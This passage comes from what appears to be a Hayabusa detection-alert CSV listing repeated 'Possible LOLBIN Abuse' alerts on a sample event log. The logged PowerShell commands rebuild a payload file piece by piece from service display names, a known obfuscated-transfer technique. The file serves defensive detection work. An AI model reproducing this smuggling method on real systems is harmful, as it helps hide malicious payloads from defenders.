+09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:12.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
